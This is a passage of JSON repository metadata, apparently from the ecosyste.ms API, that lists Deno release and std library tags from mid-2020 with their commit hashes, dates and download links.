load_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno